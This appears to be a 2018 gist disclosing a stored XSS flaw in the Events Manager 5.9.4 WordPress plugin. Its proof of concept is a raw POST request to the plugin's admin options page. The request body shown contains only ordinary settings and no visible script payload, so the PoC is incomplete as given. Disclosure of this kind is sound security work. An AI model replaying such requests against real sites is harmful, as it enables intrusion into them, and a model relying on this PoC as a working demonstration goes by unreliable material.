@ansarisec
Created July 3, 2018 15:09
Stored XSS in Events Manager 5.9.4
Product: Events Manager 5.9.4 plugin for WordPress
POC:
POST /wordpress/wp-admin/edit.php?post_type=event&page=events-manager-options HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xxxxxx/wordpress/wp-admin/edit.php?post_type=event&page=events-manager-options
Content-Type: application/x-www-form-urlencoded
Content-Length: 736
Cookie: wp-saving-post=41-saved; wordpress_xxxxx
Connection: close
Upgrade-Insecure-Requests: 1
-----
import_settings_file=&dbem_cp_events_slug=events&dbem_cp_locations_slug=locations&dbem_taxonomy_category_slug=events%2Fcategories&dbem_taxonomy_tag_slug=events&Submit=Save+Changes+%28All%29&dbem_event_reapproved_email_body=Dear+%23_CONTACTNAME%2C+%0D%0A%0D%0AYour+event+%23_EVENTNAME+on+%23_EVENTDATES+has+been+approved.%0D%0A%0D%0AYou+can+view+your+event+here%3A+%23_EVENTURL%0D%0A%0D%0A%0D%0A-------------------------------%0D%0A%0D%0APowered+by+Events+Manager+-+http%3A%2F%2Fwp-events-plugin.com&em-submitted=1&_wpnonce=73cfc75e10&tab_path=pages%2Bpermalinks
-----